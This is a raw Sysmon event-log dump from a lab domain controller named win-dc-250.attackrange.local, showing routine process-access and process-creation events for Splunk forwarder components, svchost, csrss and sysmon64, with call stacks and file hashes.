10341000x800000000000000014039Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:17.501{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014038Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:17.501{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014037Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:17.501{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-49C1-6000-8105-000000009A01}5996C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014036Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:17.501{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-49C1-6000-8105-000000009A01}5996C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014035Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:17.502{08A6967A-49C1-6000-8105-000000009A01}5996C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014060Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:18.845{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-49C2-6000-8305-000000009A01}5580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014059Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:18.845{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014058Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:18.845{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014057Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:18.845{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014056Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:18.845{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014055Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:18.845{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-49C2-6000-8305-000000009A01}5580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014054Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:18.845{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-49C2-6000-8305-000000009A01}5580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014053Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:18.846{08A6967A-49C2-6000-8305-000000009A01}5580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014052Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:18.329{08A6967A-49C2-6000-8205-000000009A01}55685220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014051Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:18.173{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-49C2-6000-8205-000000009A01}5568C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014050Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:18.173{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014049Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:18.173{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014048Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:18.173{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014047Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:18.173{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014046Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:18.173{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-49C2-6000-8205-000000009A01}5568C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014045Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:18.173{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-49C2-6000-8205-000000009A01}5568C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014044Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:18.174{08A6967A-49C2-6000-8205-000000009A01}5568C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014069Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:19.923{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-49C3-6000-8405-000000009A01}5468C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014068Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:19.923{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014067Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:19.923{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014066Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:19.923{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014065Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:19.923{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014064Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:19.923{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-49C3-6000-8405-000000009A01}5468C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014063Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:19.923{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-49C3-6000-8405-000000009A01}5468C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program 